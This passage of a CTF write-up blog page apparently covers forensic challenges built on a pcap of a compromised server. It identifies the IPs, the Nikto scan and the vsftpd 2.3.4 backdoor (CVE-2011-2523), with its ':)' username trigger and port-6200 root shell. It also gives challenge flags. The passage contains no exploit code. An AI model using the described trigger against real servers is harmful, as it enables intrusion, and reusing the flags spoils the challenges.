1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Networking</h2>\n<h3 id=\"vicker-ipforensic\" style=\"position:relative;\"><a href=\"#vicker-ipforensic\" aria-label=\"vicker ipforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Vicker IP(Forensic)</h3>\n<blockquote>\n<p>Hi! It’s good to see you again in my networking series. There are total 18 challenges in this series &#x26; based on real life events of how can a server be compromised. Please download the attachment which will be used to answer all the questions. Don’t make it too complex. Just keep it simple. Hope you’ll solve them all. Wish you all a very good luck.</p>\n<p>Scenario: Recently one of Knight Squad’s asset was compromised. We’ve figured out most but need your help to investigate the case deeply. As a SOC analyst, analyze the pacp file &#x26; identify the issues.</p>\n<p>So let’s start with the basic.</p>\n<p>What is the victim &#x26; attacker ip?</p>\n</blockquote>\n<p>This is a series of challenges that involves analyzing the provided pcap file.</p>\n<p>In the first problem, we need to identify the victim and attacker IP addresses.</p>\n<p>We can identify the attacker and the victim by finding packets that request URLs that look like attack queries.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ecb59ca0262eb9ab481364f1e09fe759/58354/image-20240121183054187.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 52.916666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABR0lEQVQoz5VSy3KDMAzkX3pIbWwMwXbohPKwCWnTU9vp/3/KVlZgMp3mEA6L1sKzlrTKvPeoqgrWWtR1jbIskXJrPp23IKvrPYwxfEgCRVEgxglN0zBP/7YgS588z1lMaw0pJfq+h3OW80qpTchijNzuOI5wFIUQzJNoeiBdSvFRZPM8UzXuKuhugmmegqpdRR8VZkFLQiFEFl4F27aFKQ2U3ljhFCa42iEMgaKFfBbER8zTCQfnoWQOnVOFd3Avn8XLjProMZwjx52RGN8m9HNAXtGrtoSuzV2olac7DHK5+znDzA3az4niAU+txvFrQvdNs31/hf/o4C8JCyccGLQJS646vUAHBxUsVZha3ZPL3cBR7gTzE4/Cci5Fbx32ZcVtFrn+AyUVjybhujaLy8kcIQUG4iGM0AW1TMtdLGDHyaT/uJnyC1yRXYw+Z0vrAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ecb59ca0262eb9ab481364f1e09fe759/8ac56/image-20240121183054187.webp 240w,\n/static/ecb59ca0262eb9ab481364f1e09fe759/d3be9/image-20240121183054187.webp 480w,\n/static/ecb59ca0262eb9ab481364f1e09fe759/e46b2/image-20240121183054187.webp 960w,\n/static/ecb59ca0262eb9ab481364f1e09fe759/29105/image-20240121183054187.webp 1396w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ecb59ca0262eb9ab481364f1e09fe759/8ff5a/image-20240121183054187.png 240w,\n/static/ecb59ca0262eb9ab481364f1e09fe759/e85cb/image-20240121183054187.png 480w,\n/static/ecb59ca0262eb9ab481364f1e09fe759/d9199/image-20240121183054187.png 960w,\n/static/ecb59ca0262eb9ab481364f1e09fe759/58354/image-20240121183054187.png 1396w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ecb59ca0262eb9ab481364f1e09fe759/d9199/image-20240121183054187.png\"\n            alt=\"image-20240121183054187\"\n            title=\"image-20240121183054187\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at this packet, we can see that it is carrying out a web-scan-like attack.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d418a3b4457b5372b78bbf1f3d18eb53/d4b10/image-20240121183137392.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 59.583333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAAC3ElEQVQoz22R60uTYRjG92doaHQiN92Wpptrm27qXJo659LNimYnNKPUclYgFEn0JSo6CCIY0zxUWzZT06yclrnMDiSRlZ2Lgk4fgvJL8OvZawhZH35cz3O/LxfXc1+ygnIbeTuzsG5Px7ojjdxdVsylKUQYo4g2z2ehZRHRpmjmi3OUKYoIQ4QgcpbIPzrPOE/6R3Zj0s+tqS7GXvUw+WWQlz9G6B09Q4V7Mwcqq9hU5CLLlI4tM5tVaRYs+lQyjWaBScIisIp7qlbPkgWLheGUj9E3AUJvu3j8/RrPpoP03Wsl0HqB8cEQ1ZUeLBmZ6JI1GA16UsIYDTNqMMze9St0qNQqYfjMLwy7CL25xOT3QZ5PD9N//yztHUOM3/vE8RNt2O3FJCUlExsbiyKMQoF8DuG5UqlENvCwjaEnfoaf+rn/oZeJL/0ERrw0NnTS1HSR3TV1uN1lOBwu1Gq1MJOjVqmk81xUYi5r7TuBL9iIb6iR3jte8dxmWrrr8flGOHWqg61lVZSUlOEW2PKLMKakoVSpWRoTQ4xcPks4pZQw9DrA2Pse7op0z38O8+rXCNcnztHdco4bgR4O7zvA3ioP5Vu2UrphC5vXb8RpL6AgJwdHbi4FgtV5eayyWmcSDj05z/DUBW6+6OTR1wGxx+t0jTbT1uRnsP82NZ79pKaYUMYpSFyeIKHVaEiegyYxccbw7oceHny+wsS3q7zjNh8ZJ/i4k/b2IKOhtxw75pV2aDZbiI2Lk54V1nBBf/Hnm6zuqIdDJ/dy8PhuDjfUcqSxltpDVTR7+6ivFzssr6a4eAMulxuNRotCHvP/UsRMSqg1ZJKRswajxYE+w4Eu3UFalhP/+SDe0wFqqvdRuWMPpaWVOF0lZGXnsyw+QZSyVCrin1KWJSwnSauT0Or0xCdq0Qkd677MwysD1FZU4CnfxrrCQpz5dtY6hNrtFIoiimw2SZ1Cc1eulBL+BiLODbq6BVrJAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d418a3b4457b5372b78bbf1f3d18eb53/8ac56/image-20240121183137392.webp 240w,\n/static/d418a3b4457b5372b78bbf1f3d18eb53/d3be9/image-20240121183137392.webp 480w,\n/static/d418a3b4457b5372b78bbf1f3d18eb53/e46b2/image-20240121183137392.webp 960w,\n/static/d418a3b4457b5372b78bbf1f3d18eb53/7f80f/image-20240121183137392.webp 1394w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d418a3b4457b5372b78bbf1f3d18eb53/8ff5a/image-20240121183137392.png 240w,\n/static/d418a3b4457b5372b78bbf1f3d18eb53/e85cb/image-20240121183137392.png 480w,\n/static/d418a3b4457b5372b78bbf1f3d18eb53/d9199/image-20240121183137392.png 960w,\n/static/d418a3b4457b5372b78bbf1f3d18eb53/d4b10/image-20240121183137392.png 1394w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d418a3b4457b5372b78bbf1f3d18eb53/d9199/image-20240121183137392.png\"\n            alt=\"image-20240121183137392\"\n            title=\"image-20240121183137392\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So the correct flag was <code class=\"language-text\">KCTF{192.168.1.8_192.168.1.7}</code>.</p>\n<h3 id=\"basic-enumforensic\" style=\"position:relative;\"><a href=\"#basic-enumforensic\" aria-label=\"basic enumforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Basic Enum(Forensic)</h3>\n<blockquote>\n<p>What tool did the attacker use to do basic enumeration of the server?</p>\n<p>Please use the attachment of the first challenge.</p>\n<p>Flag Format: KCTF{toolname}</p>\n</blockquote>\n<p>In the next problem, we need to identify the tool used to perform the web scan.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c7d6836a9d0eb7fc03f0875a9fd1a432/bed7a/image-20240121185400349.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 34.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABWklEQVQoz3WQ207CUBBF+2FCuIgQ+A6UKIbvghcDSMSE3pDSQmLEaCh30gImWjUpclEDbKeHwovhYWdmTuess1IuFo8gmgzhOOFD6NyHcDLAauQyiFjqBNFUCOELP0vgzAtf/IjFH/ds66mH9QGqwYQXnPScgTa4Rn1YQG9axtNrCa1PEcNZheY7jH81vKxr6Nky7s0bNC2efdc/hG3ehf3Z6EcFJ7bSUM0cJYvuUsKDRZemJXQXElUexrqCCTS05yLqkzwaVhGdhQhzo2CE6j7OPKbKCc00qkYWmpFDdy6h8VZE0y6hMyMLW4CxUgioslmlvcrgiu2YawJt/ocT9TQ0M0/JMSvHQLd51utTgS4qzLBDhjXaqY3y6C9ldnYQqAyz9LoLZIY8ASQGNlcu0DV00v8uM+sdZEz9LpzczjA75+XeQsajdesaymh9iXtD53c4hg6wTfBDwD85O81yQMMTxwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c7d6836a9d0eb7fc03f0875a9fd1a432/8ac56/image-20240121185400349.webp 240w,\n/static/c7d6836a9d0eb7fc03f0875a9fd1a432/d3be9/image-20240121185400349.webp 480w,\n/static/c7d6836a9d0eb7fc03f0875a9fd1a432/e46b2/image-20240121185400349.webp 960w,\n/static/c7d6836a9d0eb7fc03f0875a9fd1a432/00f91/image-20240121185400349.webp 1437w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c7d6836a9d0eb7fc03f0875a9fd1a432/8ff5a/image-20240121185400349.png 240w,\n/static/c7d6836a9d0eb7fc03f0875a9fd1a432/e85cb/image-20240121185400349.png 480w,\n/static/c7d6836a9d0eb7fc03f0875a9fd1a432/d9199/image-20240121185400349.png 960w,\n/static/c7d6836a9d0eb7fc03f0875a9fd1a432/bed7a/image-20240121185400349.png 1437w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c7d6836a9d0eb7fc03f0875a9fd1a432/d9199/image-20240121185400349.png\"\n            alt=\"image-20240121185400349\"\n            title=\"image-20240121185400349\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at the access history, I found requests to files containing the string Nikto.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0f1e9cc452e0ffc00603300f31a55c4f/844cc/image-20240121190832240.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 6.666666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAVklEQVQI12NYcWL2/wX7p/1femTm/9Vn5v1ff3HBf5DYpiuL/685O+//hkuL/m+9sRSM15yb93/JkRn/lx2dCVYPUrf16tL/O2+u+L/j5vL/228s+w8As6U99uXL750AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0f1e9cc452e0ffc00603300f31a55c4f/8ac56/image-20240121190832240.webp 240w,\n/static/0f1e9cc452e0ffc00603300f31a55c4f/d3be9/image-20240121190832240.webp 480w,\n/static/0f1e9cc452e0ffc00603300f31a55c4f/e46b2/image-20240121190832240.webp 960w,\n/static/0f1e9cc452e0ffc00603300f31a55c4f/83135/image-20240121190832240.webp 1306w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0f1e9cc452e0ffc00603300f31a55c4f/8ff5a/image-20240121190832240.png 240w,\n/static/0f1e9cc452e0ffc00603300f31a55c4f/e85cb/image-20240121190832240.png 480w,\n/static/0f1e9cc452e0ffc00603300f31a55c4f/d9199/image-20240121190832240.png 960w,\n/static/0f1e9cc452e0ffc00603300f31a55c4f/844cc/image-20240121190832240.png 1306w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0f1e9cc452e0ffc00603300f31a55c4f/d9199/image-20240121190832240.png\"\n            alt=\"image-20240121190832240\"\n            title=\"image-20240121190832240\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Therefore, <code class=\"language-text\">KCTF{nikto}</code> was the correct flag.</p>\n<h3 id=\"vulnerable-serviceforensic\" style=\"position:relative;\"><a href=\"#vulnerable-serviceforensic\" aria-label=\"vulnerable serviceforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Vulnerable Service(Forensic)</h3>\n<blockquote>\n<p>What service was vulnerable to the main server?</p>\n<p>Please use the attachment of the first challenge.</p>\n<p>Flag Format: KCTF{service<em>version} >>all</em>lower_case</p>\n</blockquote>\n<p>Next, the information needed for the flag appears to be the service with the vulnerability the attacker exploited and its version.</p>\n<p>After reviewing the attack packets, I found that the attacker gained an initial foothold using FTP.</p>\n<p>Looking through the FTP packets one by one, I found the following suspicious packet.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 602px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b53f5bea9523770dd3ddc799009f4e5c/32056/image-20240122215826994.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 73.33333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAADa0lEQVQ4y42Sf0yUdRzHH9BNaGTjxz2HInB3SMDx47ay+t+oGMYGtlHZr39qruUKmoAgKBjqpmUeHnfcAcIdz0nClRMQBFvOoccdWMTx42oZMa1UwJxWrq2tV997cK2rP+qP197vz/vz2Xff5/N8pZwnHyWjNJ3s5408vDUdTUECcqEGeYuGuGdiwymII7FIqxIvfKzIQqp9Vlbn5S0yUmVFHWVv76K6qoHysmreEb62plGt3y2roWrnXqorGthVUU91ZQN7aw+qVO3cE5a9V3+Yut0HkI6aO7C3foSt5QQt9m6sLW6sNreqocxmCyfUa7Yp4ZlVEYi8WUGanl7E65tnzP8dPsFF77fMzC7jH19gemaZH3/4g6VFWLy5wuTUdSYuX2UueJubN+CGYHbuFstLsLDwG5LF2sLhI2be/zBEk+qbbXY+ONqExWrH6VJwu7txK90oygmaLFaOmI+J27eqtaK41fnQTEeHC8npOklLqwt7W4gubA4Xzq4e1XeK3qlTgwz0j9DfP0x/3zDHO7txtHfh7v5EZCP09Z3F1dXLwMA5env7kIYGL+L5eASPZ1jVXs8IZ4cucfr0ZwwJvTQaYNw3h38sxCxnzoyKQ87z6Tn/SuadUecmfEEunP8cKfDNL3gDi/iml1S8U4tMz9/DL/Y3deVXrt0Su/tZ7OruCpNf32Vi9ieCV39X6+t3IHDlnjozL/YpjZmP4z3WjtfcxphFaFM7E5ZOtZ5odjLn6OErR+9fjFs6xEwbly1OgvYegqL/hfjroV5AvACpNi6GgzoN+/UaDhhk9gvfoF1Lo0FDvfwgNasjqY6Q7hPBvqRYGnUJNIjebtGrWb2KffJD1ERGUBcThSSnmXhA1hGbEEdMnHj9WpnElBTWpaSyXmdgXaoObXLySiZ8YnIqSTo9a+PjiVizhlXR0URGRd3XaKSsTCOvvvIGb71Zzssvvc62F1/DmGVEKyeQtD6R5A0bSDMYMAjS/oZBr0ev0/0L6YnHHicwOsX3M9dwtXs4dMhBZWU927eXsWNHFVtLSsnOzsZkMpGXlxdGKDP9Q6VNj2xi8sKXnFQGKSvfQ2FhMcXFpYIXKCnZxubNT2M0GsnJyRXk/CdSlvi8/KcKKSp6jvz8AjIy0tm4MY309DShBjIzM8jN/X+HhfgTOqfMPjGon+EAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b53f5bea9523770dd3ddc799009f4e5c/8ac56/image-20240122215826994.webp 240w,\n/static/b53f5bea9523770dd3ddc799009f4e5c/d3be9/image-20240122215826994.webp 480w,\n/static/b53f5bea9523770dd3ddc799009f4e5c/ff4b8/image-20240122215826994.webp 602w\"\n              sizes=\"(max-width: 602px) 100vw, 602px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b53f5bea9523770dd3ddc799009f4e5c/8ff5a/image-20240122215826994.png 240w,\n/static/b53f5bea9523770dd3ddc799009f4e5c/e85cb/image-20240122215826994.png 480w,\n/static/b53f5bea9523770dd3ddc799009f4e5c/32056/image-20240122215826994.png 602w\"\n            sizes=\"(max-width: 602px) 100vw, 602px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b53f5bea9523770dd3ddc799009f4e5c/32056/image-20240122215826994.png\"\n            alt=\"image-20240122215826994\"\n            title=\"image-20240122215826994\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This exploits the backdoor embedded in <code class=\"language-text\">vsftpd 2.3.4</code>, a vulnerability where attempting an FTP connection with a username containing <code class=\"language-text\">:)</code> opens the backdoor on TCP port 6200.</p>\n<blockquote>\n<p>The source archive for <code class=\"language-text\">vsftpd</code> version 2.3.4, <code class=\"language-text\">vsftpd-2.3.4.tar.gz</code>, included backdoor code that allowed arbitrary code execution from a remote system.\nWhen <code class=\"language-text\">vsftpd</code> is installed and started with the backdoor code included, making an FTP connection with a username containing the specific string <code class=\"language-text\">:)</code> opens the backdoor port, TCP 6200. Connecting to that backdoor port remotely allows arbitrary commands to be executed.</p>\n</blockquote>\n<p>Reference: <a href=\"https://www.intellilink.co.jp/column/vulner/2011/070600.aspx\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Validation Report on the Backdoor Included in vsftpd 2.3.4 | NTT DATA Advanced Technology Corporation</a></p>\n<p>So the correct flag is <code class=\"language-text\">KCTF{vsftpd_2.3.4}</code>. (I missed the requirement that it had to be lowercase, so I couldn’t get the flag accepted.)</p>\n<h3 id=\"portforensic\" style=\"position:relative;\"><a href=\"#portforensic\" aria-label=\"portforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>PORT(Forensic)</h3>\n<blockquote>\n<p>What was the port number of the reverse shell of the server?</p>\n<p>Please use the attachment of the first challenge.</p>\n<p>Flag Format: KCTF{port}</p>\n</blockquote>\n<p>The next problem asks for the port on which the attacker obtained a reverse shell as the flag.</p>\n<p>Looking up the vulnerability identified earlier shows that it was 6200.</p>\n<p>Looking in Wireshark, it seems the attacker obtained a shell as the <code class=\"language-text\">root</code> user.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 898px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/779e9cc9373dd50b1e76fbe7d7270e20/84cc5/image-20240122220256038.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 50.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAACIklEQVQoz5WSS0+TQRiFv1+gpQWK2gsglMJXeoPSWKkgJBhuFqokQgKJRo0iaKDQlosCbRVixLQWUIQCAUN0hRo1hoUb48aVCzcuXRgX/ojHYZCFRkxcPDnznsmc9yxGsXrLUE+VYq23kF9joqDWjN6bS06ljlxPDkX1RzGfMJJdocXoN2CsPiJng++QuM8Wvo48r154JgzHD6PcScySTmWYvfeIudQK6WSGhfQajxc2WJxfZ/7BimTp4RMWF9bJLG6yLFhdeiq9PX9OZKSTyyjjU2mu9Ue52jskNEJvX5hwJMbk5CzxeJKh4UkGBm8xNjZDKDRBJJIQ3hSjo9OSHT8avU1f/4hEaW87R1XVMbxeH37/SfzVtfh8NVitpej1uZiMBvKEajQH0Go1ZGVpfulBiUazqzqdVpCFkppJ8ePLN75//sr2sxd0nO0iGOykrq4Bu92Ow+HE6XTidrtxuVwC9z64JEo4dJOXm6+YGY/jctgpKDBTWJhPSYmF8vJybDbbf6GMhMYYvB6lPdhFZ+cFursv0dNzhYaGZlRVFS0dsukee0v2W6bcn04yER6hTLVRWemR9d3uCvmguLhINC3GYtllZ1bVst9C/0RJTNxlbT7DxfOXaWwM0NoapKWlnaamwK4Kr7m5TZ4DgQ48Hq9s/rcwGRiLJXm3/Yk3rz+ytfWe51sf2Fh/SzicEF8kzvBwTH6LgRtRAqfPiMCqfwb+BOiBfZEWkNMnAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/779e9cc9373dd50b1e76fbe7d7270e20/8ac56/image-20240122220256038.webp 240w,\n/static/779e9cc9373dd50b1e76fbe7d7270e20/d3be9/image-20240122220256038.webp 480w,\n/static/779e9cc9373dd50b1e76fbe7d7270e20/005c4/image-20240122220256038.webp 898w\"\n              sizes=\"(max-width: 898px) 100vw, 898px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/779e9cc9373dd50b1e76fbe7d7270e20/8ff5a/image-20240122220256038.png 240w,\n/static/779e9cc9373dd50b1e76fbe7d7270e20/e85cb/image-20240122220256038.png 480w,\n/static/779e9cc9373dd50b1e76fbe7d7270e20/84cc5/image-20240122220256038.png 898w\"\n            sizes=\"(max-width: 898px) 100vw, 898px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/779e9cc9373dd50b1e76fbe7d7270e20/84cc5/image-20240122220256038.png\"\n            alt=\"image-20240122220256038\"\n            title=\"image-20240122220256038\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The correct flag is <code class=\"language-text\">KCTF{6200}</code>.</p>\n<h3 id=\"cve-idforensic\" style=\"position:relative;\"><a href=\"#cve-idforensic\" aria-label=\"cve idforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>CVE ID(Forensic)</h3>\n<blockquote>\n<p>What’s the CVE id for the vulnerable service?</p>\n<p>Please use the attachment of the first challenge.</p>\n</blockquote>\n<p>Again, based on the vulnerability research, we can determine that the correct flag is <code class=\"language-text\">KCTF{CVE-2011-2523}</code>.</p>\n<p>Reference: <a href=\"https://www.exploit-db.com/exploits/49757\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">vsftpd 2.3.4 - Backdoor Command Execution - Unix remote Exploit</a></p>\n<h3 id=\"famous-toolforensic\" style=\"position:relative;\"><a href=\"#famous-toolforensic\" aria-label=\"famous toolforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Famous Tool(Forensic)</h3>\n<blockquote>\n<p>The attacker used a popular tool to gain access of the server. Can you name it?</p>\n</blockquote>\n<p>This challenge asks us to identify the famous tool the attacker used to gain access to the server.</p>\n<p>Since we already know the vulnerability, searching for something like <code class=\"language-text\">vsftpd 2.3.4 backdoor tool</code> shows that most of the top results are Metasploit.</p>\n<p><span\n      